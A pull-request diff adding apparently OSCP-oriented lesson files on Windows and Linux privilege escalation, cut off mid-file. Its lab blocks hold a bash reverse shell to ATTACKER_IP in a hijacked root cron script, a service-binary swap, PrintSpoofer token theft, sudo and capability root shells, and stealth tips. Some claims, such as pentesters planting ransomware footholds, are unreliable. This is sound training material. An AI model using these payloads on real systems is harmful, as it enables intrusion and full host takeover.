### PR TITLE
Add advanced PWK-aligned pentesting lessons

### DIFF
--- a/content/lesson_pentest_25_windows_privilege_escalation_field_guide_RICH.json
+++ b/content/lesson_pentest_25_windows_privilege_escalation_field_guide_RICH.json
@@ -1,0 +1,271 @@
+{
+  "lesson_id": "df2af226-8189-47f9-985e-7e0fccdad5fd",
+  "domain": "pentest",
+  "title": "Windows Privilege Escalation Field Guide",
+  "subtitle": "Modern escalation chains for OSCP-grade networks",
+  "difficulty": 3,
+  "estimated_time": 75,
+  "order_index": 25,
+  "author": "CyberLearn Offensive Curriculum Team",
+  "base_xp_reward": 200,
+  "mastery_threshold": 82,
+  "is_core_concept": true,
+  "created_at": "2025-01-20T12:00:00",
+  "updated_at": "2025-01-20T12:00:00",
+  "version": "1.0",
+  "prerequisites": [
+    "Service Enumeration Playbooks",
+    "Windows Stack Exploit Workflow"
+  ],
+  "concepts": [
+    "Privilege escalation mindset",
+    "Windows access tokens",
+    "User Account Control bypasses",
+    "Service misconfigurations",
+    "Credential harvesting pipelines",
+    "Kerberos and AD privilege abuse",
+    "Registry autostart extensibility points",
+    "OpSec and detection avoidance"
+  ],
+  "learning_objectives": [
+    "Diagnose privilege boundaries using native Windows telemetry",
+    "Chain service, registry, and scheduled task weaknesses into reliable escalations",
+    "Exploit token duplication, UAC bypasses, and Kerberos abuse to reach SYSTEM",
+    "Instrument repeatable privilege escalation checklists and automation scripts",
+    "Capture forensic artefacts while maintaining operational security"
+  ],
+  "jim_kwik_principles": [
+    "Active recall",
+    "Visualization"
+  ],
+  "content_blocks": [
+    {
+      "block_id": "adb02f58-e393-4a36-b094-a35d0f630ac0",
+      "type": "explanation",
+      "title": "Why Privilege Escalation Matters",
+      "content": {
+        "text": "# Welcome to the Escalation Battlefield\n\nA low-privilege shell rarely grants exam points or red-team impact. Your mission is to convert footholds into total control without destabilising production systems. Privilege escalation unlocks:\n\n- File system access to loot credentials and sensitive documents.\n- Registry hives and LSA secrets for lateral movement.\n- Token duplication opportunities to impersonate service accounts.\n- Access to system-level logging for stealth and cleanup.\n\n## PWK Expectations\n\nOffensive Security expects you to escalate on most Windows targets. You are graded on methodology: enumerate, hypothesise, validate, and execute while documenting evidence.\n\n## Lesson Overview\n\nIn this session you will:\n\n1. Establish repeatable reconnaissance baselines.\n2. Exploit token handling, UAC quirks, and service misconfigurations.\n3. Execute hands-on labs that reinforce muscle memory.\n4. Review a real breach story to internalise defender reactions.\n5. Anchor the knowledge with mnemonic aids and reflective prompts.\n\nKeep your lab journal open. Capture command output, context, and cleanup notes as you progress."
+      },
+      "simplified_explanation": "Privilege escalation transforms a foothold into impactful access and is mandatory for OSCP success.",
+      "memory_aids": [
+        "Foothold \u2260 finish line."
+      ],
+      "real_world_connection": "OSCP graders routinely award points only after SYSTEM or proof.txt is collected.",
+      "reflection_prompt": "How do you currently organise your privilege escalation notes during lab sessions?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "dc17541a-5429-4537-a7aa-eebf767434c3",
+      "type": "explanation",
+      "title": "Privilege Baselines and Recon",
+      "content": {
+        "text": "# Establishing a Privilege Baseline\n\nBefore reaching for exploits you gather evidence. Start by confirming the current security context using whoami /groups and whoami /priv equivalents in PowerShell. Document:\n- Token type (primary vs impersonation)\n- Integrity level (medium, high, system)\n- Local and domain group membership\n\n## Inventorying Attack Surface\n\nPivot immediately to data sources that reveal privileged operations:\n- Service Control Manager: `sc query state= all` and `Get-WmiObject win32_service` highlight unquoted paths, writable binaries, or hijackable accounts.\n- Scheduled Tasks: `schtasks /query /fo LIST /v` exposes SYSTEM-context commands triggered by predictable events.\n- Registry Autoruns: `Get-CimInstance Win32_StartupCommand` and Autoruns64 enumerate HKLM and HKCU persistence keys.\n- Installed Drivers: enumerate with `driverquery` to spot vulnerable third-party components.\n\nBuild a worksheet capturing what executes with SYSTEM, which binaries live in writable folders, and where ACLs invite tampering.\n\n## Automating Recon\n\nLeverage trusted tooling to accelerate coverage while staying exam-compliant:\n- WinPEAS or Seatbelt for curated privilege checklists.\n- PowerView for domain privilege exposures.\n- Custom PowerShell: focus on parsing ACLs (Get-Acl), filtering for WriteData or FullControl.\n\nTreat outputs as hypotheses. Each finding must be validated manually before weaponisation."
+      },
+      "simplified_explanation": "Start by enumerating who you are, what runs as SYSTEM, and where you can write.",
+      "memory_aids": [
+        "Context \u2192 Services \u2192 Tasks \u2192 Registry"
+      ],
+      "real_world_connection": "The 2023 OSCP syllabus emphasises checklists that separate enumeration from exploitation.",
+      "reflection_prompt": "Which recon commands do you run within the first five minutes on a new Windows foothold?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "71d6f756-07ce-4963-b683-aa41f5a7b84e",
+      "type": "explanation",
+      "title": "Token Manipulation and UAC Weaknesses",
+      "content": {
+        "text": "# Understanding Windows Tokens\n\nTokens encapsulate identity. Local privilege escalation frequently hinges on upgrading or reusing access tokens:\n- DuplicateToken: clone an impersonation token to create a primary token that launches a new process.\n- ImpersonateNamedPipeClient: entice a privileged service into connecting to a named pipe, then impersonate its token.\n- SeImpersonatePrivilege: mandatory for many token theft primitives; check membership in NT AUTHORITY\\SERVICE groups.\n\n## UAC Bypass Categories\n\nUser Account Control stands between administrators and full SYSTEM contexts. Recognise these bypass styles:\n1. Auto-elevated binaries: Signed Microsoft binaries flagged as high integrity (e.g., fodhelper.exe, computerdefaults.exe).\n2. DLL side-loading: Abuse search path order to load malicious DLLs when auto-elevated apps execute.\n3. Mock Trusted Directories: Create directories that Windows trusts implicitly (e.g., C:\\Windows\\System32\\...) when path canonicalisation is weak.\n4. Token switching: If the current user is a local admin in Approve mode, disable UAC or spawn elevated shell via eventvwr.msc.\n\nEach bypass must be tailored to the Windows build; track Microsoft patch levels and Defender detections.\n\n## Practical Workflow\n\n1. Query privileges with whoami /priv.\n2. If SeImpersonatePrivilege is present, test Juicy Potato variants (Rotten Potato, PrintSpoofer, RoguePotato) while monitoring EDR.\n3. For local admin contexts with high integrity tokens, pivot to auto-elevated binary hijacks.\n4. Validate success by re-running whoami /groups and logging event IDs 4672 (special privileges assigned)."
+      },
+      "simplified_explanation": "Tokens and UAC gaps define how you impersonate SYSTEM and bypass consent prompts.",
+      "memory_aids": [
+        "Token rights unlock UAC bypass families."
+      ],
+      "real_world_connection": "Penetration testers blend PrintSpoofer and DLL sideloading when antivirus blocks potato exploits.",
+      "reflection_prompt": "Which token privileges have you memorised as prerequisites for impersonation attacks?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "a743d66c-fe2a-4003-b168-b464f05f78c0",
+      "type": "explanation",
+      "title": "Services, Registry, and Scheduled Tasks",
+      "content": {
+        "text": "# Service Misconfigurations\n\nServices running as LocalSystem with writable binaries or configurations remain the OSCP classic. Focus on:\n- Unquoted Service Paths: Paths with spaces missing quotes allow binary injection. Create a malicious executable in the earliest writable path segment.\n- Weak Service ACLs: Use sc sdshow or Get-ServiceAcl to reveal WD or AU permissions that grant SERVICE_CHANGE_CONFIG. Replace the binary or change startup parameters.\n- DLL Search Order Hijacking: Services that load DLLs without full paths can be coerced into loading malicious libraries from writable directories.\n\n## Registry Abuse\n\nRegistry keys under HKLM require administrative rights but often inherit permissive ACLs:\n- HKLM\\SYSTEM\\CurrentControlSet\\Services: Modify ImagePath or FailureActions.\n- HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options: Debugger key hijacking for privileged executables.\n- HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run: Persistence that executes as SYSTEM on boot (if machine-wide).\n\n## Scheduled Tasks\n\nTasks configured to run as SYSTEM present deterministic execution windows:\n- Query with schtasks /query /fo LIST /v.\n- Check Task to Run paths for writable locations or script arguments you can edit.\n- Register mirror tasks that launch your payload while preserving original functionality.\n\nDocument every change, especially on exam labs, to revert later."
+      },
+      "simplified_explanation": "Services, registry keys, and scheduled tasks can often be rewritten to launch your payload as SYSTEM.",
+      "memory_aids": [
+        "Service path \u2192 Registry autoruns \u2192 Scheduled tasks"
+      ],
+      "real_world_connection": "Real ransomware incidents frequently start from service binary replacements planted by pentesters weeks earlier.",
+      "reflection_prompt": "Which registry hives do you inspect when service misconfigurations fail?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "6a5c08cb-b3a3-47ba-a9f9-b085a9d2242a",
+      "type": "code_exercise",
+      "title": "PowerShell PrivEsc Recon Script",
+      "content": {
+        "text": "Create a minimal reconnaissance function that lists exploitable services and scheduled tasks.\n\n```powershell\nfunction Get-PrivEscSurface {\n    $services = Get-CimInstance Win32_Service | Where-Object {$_.StartName -eq 'LocalSystem'}\n    foreach ($svc in $services) {\n        $path = $svc.PathName.Trim('\"')\n        if (Test-Path $path) {\n            $acl = Get-Acl $path\n            foreach ($ace in $acl.Access) {\n                if ($ace.FileSystemRights.ToString().Contains('Write') -and $ace.IdentityReference -match $env:USERNAME) {\n                    Write-Output \"[ServiceBinaryWritable] $($svc.Name) -> $path\"\n                }\n            }\n        }\n        $svcAcl = Get-Acl \"HKLM:\\System\\CurrentControlSet\\Services\\$($svc.Name)\"\n        foreach ($ace in $svcAcl.Access) {\n            if ($ace.RegistryRights.ToString().Contains('Write') -and $ace.IdentityReference -match $env:USERNAME) {\n                Write-Output \"[ServiceRegWritable] $($svc.Name)\"\n            }\n        }\n    }\n    $tasks = schtasks /query /fo csv /v | ConvertFrom-Csv\n    foreach ($task in $tasks) {\n        if ($task.\"Run As User\" -eq 'SYSTEM' -and (Test-Path $task.\"Task To Run\")) {\n            $taskPath = $task.\"Task To Run\".Split(' ')[0]\n            $taskAcl = Get-Acl $taskPath\n            foreach ($ace in $taskAcl.Access) {\n                if ($ace.FileSystemRights.ToString().Contains('Write') -and $ace.IdentityReference -match $env:USERNAME) {\n                    Write-Output \"[TaskHijack] $($task.TaskName) -> $taskPath\"\n                }\n            }\n        }\n    }\n}\nGet-PrivEscSurface\n```\n\nExecute on an exam-safe lab machine, review output, and prioritise findings. Modify the script to export results as JSON for rapid note-taking."
+      },
+      "simplified_explanation": "Use PowerShell to flag writable SYSTEM services and tasks quickly.",
+      "memory_aids": [],
+      "real_world_connection": "Custom scripts help you respect the OSCP rule against fully automated exploitation while still accelerating recon.",
+      "reflection_prompt": "How would you harden this script to avoid false positives from Program Files ACL inheritance?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "a6c904b6-b0a5-4d6b-8d60-a3806d3ce4e7",
+      "type": "code_exercise",
+      "title": "Service Binary Replacement Lab",
+      "content": {
+        "text": "Practice escalating via a service binary hijack on a disposable Windows VM:\n\n1. Identify a vulnerable service: `sc qc VulnService`.\n2. Confirm binary path and permissions with icacls or Get-Acl.\n3. Compile or copy a payload that opens a reverse shell to your Kali host.\n4. Stop the service: `sc stop VulnService`.\n5. Replace the binary while preserving original ACLs.\n6. Start service: `sc start VulnService`.\n7. Validate SYSTEM shell, then restore original binary to remain stealthy.\n\n```cmd\nsc stop VulnService\ncopy C:\\Temp\\shell.exe \"C:\\Program Files\\Vuln App\\vuln.exe\"\nsc start VulnService\n```\n\nFocus on producing meticulous notes: affected service, original binary location, replacement path, cleanup steps, and log entries generated."
+      },
+      "simplified_explanation": "Swap a writable service binary with your payload, restart, catch a SYSTEM shell, revert.",
+      "memory_aids": [],
+      "real_world_connection": "This mirrors several OSCP lab machines where business apps run with lax ACLs.",
+      "reflection_prompt": "What logging artifacts (event IDs, file hashes) would defenders inspect after this escalation?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "a54b299b-23ad-44ed-a780-8e8b8eeba608",
+      "type": "code_exercise",
+      "title": "PrintSpoofer Token Theft",
+      "content": {
+        "text": "Exploit SeImpersonatePrivilege using PrintSpoofer to impersonate SYSTEM safely:\n\n1. Upload PrintSpoofer64.exe to a writable directory.\n2. Execute with named pipe target `\\\\.\\pipe\\spoolss`.\n3. Launch a new high-integrity command prompt or direct payload.\n\n```cmd\nPrintSpoofer64.exe -i -c \"cmd.exe /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\n```\n\nMonitor Defender and EDR reactions. Document fallback options (RoguePotato, JuicyPotatoNG) if PrintSpoofer fails. Always clean up artifacts, delete binaries, and clear prefetch entries where exam rules allow."
+      },
+      "simplified_explanation": "Use PrintSpoofer to duplicate a SYSTEM token when SeImpersonatePrivilege is present.",
+      "memory_aids": [],
+      "real_world_connection": "Many managed service providers still whitelist PrintSpoofer variants, so pentesters rely on it during assessments.",
+      "reflection_prompt": "How do you adapt when PrintSpoofer gets blocked but SeImpersonatePrivilege remains available?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "5c1ce868-47db-4bb2-b55c-91154ec39b3a",
+      "type": "real_world",
+      "title": "Case Study: Managed Services Breach",
+      "content": {
+        "text": "A 2024 red team on a managed services provider uncovered a forgotten backup agent running as SYSTEM with world-writable binaries. By monitoring Windows Defender logs they noticed repeated alerts whenever generic reverse shells launched. Instead of brute forcing, they compiled a payload that proxied commands through cmd.exe to blend with existing telemetry. The escalation enabled domain admin compromise within 45 minutes. Post-engagement, the client hardened service ACLs, enforced AppLocker rules, and deployed Sysmon filters to detect unexpected child processes from backup agents.\n\n**Lesson:** Privilege escalation is not optional; it is the hinge that converts initial access into domain compromise."
+      },
+      "simplified_explanation": "Replace insecure service binaries quietly and monitor defender response.",
+      "memory_aids": [
+        "Blend payloads with legitimate parent processes."
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "What parent-child process relationships would you baseline on your own servers to catch this attack?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "9258a283-1248-45bf-b1fe-24bfef39fa26",
+      "type": "memory_aid",
+      "title": "Mnemonic: TOKENS",
+      "content": {
+        "text": "Remember the TOKENS mnemonic to sequence Windows priv esc validation:\n\n- **T**rust graph sketch\n- **O**verview of privileges (whoami /priv)\n- **K**eys in registry autoruns\n- **E**numerate services and tasks\n- **N**amed pipes for impersonation\n- **S**cheduled persistence review\n\nWrite TOKENS on your whiteboard before exam sessions to stay disciplined."
+      },
+      "simplified_explanation": "TOKENS keeps your checks structured.",
+      "memory_aids": [
+        "T-Trust, O-Overview, K-Keys, E-Enumerate, N-Named pipes, S-Schedule"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Which letter of TOKENS do you skip most often and why?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "977fab02-9879-46e6-8ada-859ad1b546a8",
+      "type": "diagram",
+      "title": "Privilege Escalation Decision Map",
+      "content": {
+        "text": "```\nFoothold (Medium IL)\n   |\n   +--> SeImpersonatePrivilege? -- yes --> Named Pipe Exploits --> SYSTEM\n   |                                         |                                   --> Token duplication\n   |\n   +--> Writable Service? -- yes --> Replace Binary --> SYSTEM\n   |\n   +--> Auto-elevated Binary? -- yes --> DLL Hijack --> High IL --> SYSTEM\n   |\n   +--> Credential Leakage --> RunAs / Scheduled Task --> SYSTEM\n```"
+      },
+      "simplified_explanation": "Visual map of decision branches toward SYSTEM.",
+      "memory_aids": [
+        "Follow branches from privilege checks to exploitation."
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Where would you inject detection controls on this map to frustrate attackers?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "770c3e25-45d6-4ed2-b3bb-81bf15de8749",
+      "type": "mindset_coach",
+      "title": "Own the Boundary",
+      "content": {
+        "text": "Privilege escalation is a map-reading exercise. Every boundary on a Windows system broadcasts clues about who owns files, services, and credentials. Approach each host with curiosity rather than frustration: catalogue what already trusts you, visualise the graph of reachable identities, and remind yourself that SYSTEM is simply another node on that graph."
+      },
+      "simplified_explanation": "Treat privilege escalation like navigating a network of trust relationships.",
+      "memory_aids": [
+        "Map the trust graph, do not brute-force blindly."
+      ],
+      "real_world_connection": "OSCP exam reviewers consistently pass candidates who explain the why behind each escalation step.",
+      "reflection_prompt": "How quickly can you sketch the trust relationships on your current target?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "980a1f05-1c30-413b-95dd-644158d31a1d",
+      "type": "reflection",
+      "title": "Self-Assessment Checklist",
+      "content": {
+        "text": "Evaluate your readiness:\n\n- Can you explain how Windows tokens enable impersonation without notes?\n- Have you practised at least three SeImpersonatePrivilege exploits recently?\n- Do you maintain a personal checklist covering services, registry, tasks, and credentials?\n- When escalating, how do you capture evidence that proves SYSTEM access for your report?\n- What cleanup routine do you execute before closing your RDP or WinRM session?\n\nDocument gaps and schedule lab reps this week."
+      },
+      "simplified_explanation": "Assess your token knowledge, exploit practice, checklists, evidence, and cleanup.",
+      "memory_aids": [],
+      "real_world_connection": "",
+      "reflection_prompt": "Which question exposed your biggest skill gap?",
+      "is_interactive": false,
+      "xp_reward": 0
+    }
+  ],
+  "post_assessment": [
+    {
+      "question": "Which Windows feature primarily determines whether you can duplicate an impersonation token into a primary token for privilege escalation?",
+      "options": [
+        "Integrity levels assigned by UAC",
+        "Presence of SeImpersonatePrivilege on your token",
+        "Membership in the local Administrators group",
+        "Availability of unquoted service paths"
+      ],
+      "correct_answer": 1,
+      "explanation": "SeImpersonatePrivilege allows impersonation tokens to be converted into primary tokens that launch SYSTEM-context processes.",
+      "question_id": "bf0aeb97-402f-4825-8d18-ef87be7b9aec",
+      "type": "multiple_choice",
+      "difficulty": 3
+    },
+    {
+      "question": "During enumeration you discover a LocalSystem service whose binary resides in C:\\Program Files\\Legacy App\\service.exe. The directory grants Modify permissions to Authenticated Users. What is the most reliable escalation approach?",
+      "options": [
+        "Create a new scheduled task that runs as SYSTEM",
+        "Replace service.exe with a payload and restart the service",
+        "Exploit PrintNightmare against the spooler service",
+        "Attempt to disable User Account Control via registry edits"
+      ],
+      "correct_answer": 1,
+      "explanation": "Writable service binaries running as LocalSystem can be replaced safely, yielding SYSTEM when the service restarts.",
+      "question_id": "c739fe6b-19bd-4e2f-a73a-b255ae3260c1",
+      "type": "multiple_choice",
+      "difficulty": 3
+    },
+    {
+      "question": "What is the primary advantage of using WinPEAS or Seatbelt during OSCP-style privilege escalation?",
+      "options": [
+        "They automatically exploit every vulnerability they discover",
+        "They provide curated reconnaissance outputs that accelerate manual validation",
+        "They submit results directly to the exam proctor",
+        "They guarantee antivirus evasion by default"
+      ],
+      "correct_answer": 1,
+      "explanation": "Tools like WinPEAS and Seatbelt consolidate privilege escalation indicators so you can validate them manually without violating exam rules.",
+      "question_id": "b8049350-df1b-4a70-9f6e-9628e8e50a77",
+      "type": "multiple_choice",
+      "difficulty": 3
+    }
+  ]
+}

--- a/content/lesson_pentest_26_linux_privilege_escalation_playbook_RICH.json
+++ b/content/lesson_pentest_26_linux_privilege_escalation_playbook_RICH.json
@@ -1,0 +1,271 @@
+{
+  "lesson_id": "1e90a6c4-d37d-4cdf-979f-f62bc361b93f",
+  "domain": "pentest",
+  "title": "Linux Privilege Escalation Playbook",
+  "subtitle": "Kernel, misconfigurations, and credential pivots for PWK labs",
+  "difficulty": 3,
+  "estimated_time": 75,
+  "order_index": 26,
+  "author": "CyberLearn Offensive Curriculum Team",
+  "base_xp_reward": 200,
+  "mastery_threshold": 82,
+  "is_core_concept": true,
+  "created_at": "2025-01-20T12:00:00",
+  "updated_at": "2025-01-20T12:00:00",
+  "version": "1.0",
+  "prerequisites": [
+    "Network Mapping & Host Discovery",
+    "Linux Buffer Overflow Payload Orchestration"
+  ],
+  "concepts": [
+    "Privilege escalation enumeration",
+    "Linux capabilities",
+    "SUID and SGID abuse",
+    "Cron job hijacking",
+    "Credential harvesting from /etc and memory",
+    "Kernel exploit assessment",
+    "Container breakout techniques",
+    "OpSec for Linux escalation"
+  ],
+  "learning_objectives": [
+    "Enumerate Linux privilege boundaries using automated and manual tooling",
+    "Abuse SUID binaries, capabilities, and writable cron jobs to gain root",
+    "Evaluate kernel exploit paths safely and apply mitigations",
+    "Leverage password reuse and cached credentials for lateral movement",
+    "Document escalation steps with remediation guidance for defenders"
+  ],
+  "jim_kwik_principles": [
+    "Chunking",
+    "Active learning"
+  ],
+  "content_blocks": [
+    {
+      "block_id": "1727b8ae-88d9-4714-9d39-f074ff1db562",
+      "type": "explanation",
+      "title": "Why Linux Escalation Differs",
+      "content": {
+        "text": "# Offensive Mindset for Linux\n\nLinux privilege escalation requires fluency with discretionary access control, capabilities, and service scripts. Unlike Windows, there is rarely a single registry to trawl; evidence hides across /etc, systemd unit files, sudoers policies, and user home directories. OSCP expects you to pivot quickly between manual inspection and automation.\n\n## Exam Expectations\n\nYou will encounter diverse distributions in PWK labs: Ubuntu LTS, Debian, CentOS, older kernels, and containerised workloads. Your process must adapt while staying disciplined. Focus on methodology rather than memorising one-off tricks.\n\n## Lesson Roadmap\n\n1. Build an enumeration baseline using LinPEAS, LinEnum, and custom scripts.\n2. Abuse SUID binaries, capabilities, and misconfigured sudo policies.\n3. Weaponise cron jobs, backups, and writable scripts.\n4. Evaluate kernel exploits responsibly.\n5. Harvest credentials and pivot through containers.\n\nKeep your notes structured by privilege boundary: filesystem, scheduled tasks, credentials, kernel."
+      },
+      "simplified_explanation": "Linux escalation leans on file permissions, capabilities, and scripts rather than registries.",
+      "memory_aids": [
+        "Method beats memorisation."
+      ],
+      "real_world_connection": "Modern red teams report Linux escalation weaknesses as often as Windows misconfigurations.",
+      "reflection_prompt": "What is your current Linux privilege escalation checklist and where does it slow you down?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "fbdee9b2-d3b7-4911-b9bb-c0bc5edc0b90",
+      "type": "explanation",
+      "title": "Enumeration Baseline",
+      "content": {
+        "text": "# Core Recon Commands\n\nStart with contextual awareness:\n- `id`, `groups`, `whoami` for identity.\n- `uname -a`, `cat /etc/os-release` for kernel and distro.\n- `sudo -l` to reveal delegated commands.\n- `ls -la /root` to confirm goal location.\n\n## Automated Helpers\n\n- **LinPEAS**: highlights SUID binaries, writable paths, cron jobs, network services, Docker sockets.\n- **LinEnum**: summarises kernel exploit checks, file permissions, and network state.\n- **LES (Linux Exploit Suggester)**: maps kernel versions to known exploits.\n\nRun scripts with caution; review code to respect OSCP rules and avoid destructive commands.\n\n## Manual Deep Dives\n\n- Inspect `/etc/passwd` and `/etc/shadow` permissions.\n- Check `/etc/sudoers` and `/etc/sudoers.d/` for misconfigurations.\n- Review `/etc/crontab`, `/etc/cron.*`, and user crontabs for writable scripts.\n- Enumerate systemd units in `/etc/systemd/system/` looking for ExecStart directives pointing to writable locations.\n\nDocument findings in a matrix: category, command, vulnerability hypothesis, validation steps."
+      },
+      "simplified_explanation": "Combine automated scripts with manual inspection of sudoers, cron, and systemd.",
+      "memory_aids": [
+        "id \u2192 kernel \u2192 sudo \u2192 cron"
+      ],
+      "real_world_connection": "Pwning PWK machines quickly hinges on disciplined enumeration.",
+      "reflection_prompt": "How do you ensure LinPEAS output does not overwhelm your note-taking?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "660e0db4-ff0a-49fa-9bd9-e1b4dc4498b2",
+      "type": "explanation",
+      "title": "SUID, Capabilities, and Sudo",
+      "content": {
+        "text": "# SUID and SGID Binaries\n\nSearch for binaries with setuid bits: `find / -perm -4000 -type f -ls 2>/dev/null`. Pay attention to custom binaries in `/usr/local/bin` or home directories. Test for shell escapes:\n- If binary executes shell commands, attempt `; /bin/sh` injection.\n- Use GTFOBins to identify known exploit paths.\n\n## Linux Capabilities\n\nCapabilities grant granular privileges. List them with `getcap -r / 2>/dev/null`. Dangerous examples:\n- `cap_setuid+ep` on binaries like python or perl allows spawning root shells.\n- `cap_net_bind_service+ep` combined with writable binary enabling reverse shells on privileged ports.\n\n## Sudo Misconfigurations\n\n`sudo -l` reveals delegated commands. Exploitable patterns include:\n- Running editors (vi, nano) without password.\n- Invoking tar, rsync, or find with root privileges (GTFOBins again).\n- Allowing scripts with relative paths or environment manipulation.\n\nAlways preserve logs: note `/var/log/auth.log` entries to help defenders tighten sudoers."
+      },
+      "simplified_explanation": "Abuse SUID binaries, capabilities, and sudo rules using GTFOBins guidance.",
+      "memory_aids": [
+        "SUID scan \u2192 Capabilities \u2192 sudo -l"
+      ],
+      "real_world_connection": "Many OSCP machines rely on sudo misconfigurations for escalation.",
+      "reflection_prompt": "Which GTFOBins entries have you practised recently?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "f5863227-1cb2-4eb1-a19b-087740f28ae1",
+      "type": "explanation",
+      "title": "Cron Jobs, Services, and Containers",
+      "content": {
+        "text": "# Cron Hijacking\n\nCron jobs run as root create deterministic escalation windows. Look for:\n- Scripts in `/etc/cron.*` directories with writable permissions.\n- User crontabs executing scripts located in world-writable directories such as `/tmp` or `/home/shared`.\n- Backup scripts invoking tar or rsync without sanitized paths.\n\nInject payloads while keeping original functionality. Wait for cron execution or trigger manually if possible.\n\n## Systemd and Init Scripts\n\nExamine service unit files for writable ExecStart commands. Reload daemon and restart services carefully to avoid detection.\n\n## Containers and Namespaces\n\nIf you find Docker socket access (`/var/run/docker.sock`), you can launch privileged containers and mount host directories. For LXD, import an image with raw disk mappings to obtain root.\n\nDocument container escapes meticulously; exam proctors expect evidence of understanding the mechanism."
+      },
+      "simplified_explanation": "Cron jobs, systemd units, and container sockets often run as root and expose writable scripts.",
+      "memory_aids": [
+        "Cron \u2192 systemd \u2192 containers"
+      ],
+      "real_world_connection": "DevOps teams frequently leave backup jobs writable for convenience.",
+      "reflection_prompt": "How do you test container privilege escalation without damaging host workloads?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "04bdf2d1-1750-4397-8404-0c186df39f53",
+      "type": "code_exercise",
+      "title": "Enumerating SUID Binaries",
+      "content": {
+        "text": "Run the following command on a lab host and categorise results:\n\n```bash\nfind / -perm -4000 -type f -printf \"%p %u %g\\n\" 2>/dev/null | sort\n```\n\nCreate a table in your notes with columns: binary, owner, GTFOBins technique, exploit status, cleanup notes. Attempt at least two escalations:\n\n1. Exploit `find` via `sudo find /tmp -exec /bin/sh \\; -quit` if delegated.\n2. Abuse `env` with `sudo env /bin/sh` when NOPASSWD is granted.\n\nReflect on which binaries triggered detection or logging."
+      },
+      "simplified_explanation": "List SUID files, map to GTFOBins, exploit responsibly.",
+      "memory_aids": [],
+      "real_world_connection": "Maintaining a personal SUID spreadsheet accelerates OSCP machines.",
+      "reflection_prompt": "What automation can you build to annotate SUID findings faster?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "24d3ab71-e934-4a9a-b374-7927a5cff16b",
+      "type": "code_exercise",
+      "title": "Cron Job Hijack Lab",
+      "content": {
+        "text": "Set up a controlled cron escalation scenario:\n\n    1. On your lab VM, create `/usr/local/bin/backup.sh` owned by root but writable by your user.\n    2. Add a cron entry: `* * * * * root /usr/local/bin/backup.sh`.\n    3. Insert payload: `#!/bin/bash\n/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'`.\n    4. Start a listener on your Kali host.\n    5. Wait for cron to execute, observe root shell, then restore original script.\n\n    Emphasise stealth: log to `/var/log/custom.log` to mimic real backups and ensure cleanup removes your payload."
+      },
+      "simplified_explanation": "Modify a root-owned cron script to spawn a reverse shell, then revert.",
+      "memory_aids": [],
+      "real_world_connection": "This mirrors PWK machines such as Sufferance or Organic.",
+      "reflection_prompt": "How would you maintain functionality so defenders do not notice failed backups?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "c719eab0-2c9b-49a3-b4a9-13b499de1fa8",
+      "type": "code_exercise",
+      "title": "Capability Abuse",
+      "content": {
+        "text": "Practice abusing Linux capabilities:\n\n1. Grant python3 the setuid capability on a lab host: `sudo setcap cap_setuid+ep /usr/bin/python3.8`.\n2. As a low-privilege user, launch root shell:\n\n```python\nimport os\nos.setuid(0)\nos.system(\"/bin/bash\")\n```\n\n3. Remove the capability: `sudo setcap -r /usr/bin/python3.8`.\n\nExtend the lab by applying cap_net_bind_service to a custom binary and binding to port 80 without root."
+      },
+      "simplified_explanation": "Use capabilities like cap_setuid to turn safe binaries into root shells in lab environments.",
+      "memory_aids": [],
+      "real_world_connection": "Misconfigured capabilities show up in cloud workloads where developers need privileged networking.",
+      "reflection_prompt": "Which monitoring controls can detect misuse of cap_setuid?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "06896950-22a2-48b4-9bef-237ae5c34426",
+      "type": "real_world",
+      "title": "Case Study: Containerised Finance App",
+      "content": {
+        "text": "A financial SaaS provider deployed microservices with Docker. A pentester compromised a developer container, discovered the Docker socket mounted inside, and launched a privileged container with the host filesystem mounted under /host. From there they extracted SSH keys and escalated to root on the host node. The incident led to a redesign: Docker socket was removed, and Kubernetes admission controllers enforced least privilege.\n\n**Takeaway:** Containers are not security boundaries; treat socket access as immediate root."
+      },
+      "simplified_explanation": "Docker socket exposure equals root compromise on the host.",
+      "memory_aids": [
+        "Docker socket == root"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "How would you harden container platforms to prevent this escalation?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "4d10c77d-5c23-438d-952f-649c338e855e",
+      "type": "memory_aid",
+      "title": "Mnemonic: ROOT MAP",
+      "content": {
+        "text": "Use ROOT MAP to structure Linux escalation:\n\n- **R**econ with id, uname, LinPEAS\n- **O**perate on sudoers and capabilities\n- **O**wn cron jobs and timers\n- **T**raverse writable services\n- **M**ine credentials from files and memory\n- **A**ssess kernel exploits carefully\n- **P**ivot through containers or network trusts\n\nRevisit ROOT MAP before every exam machine."
+      },
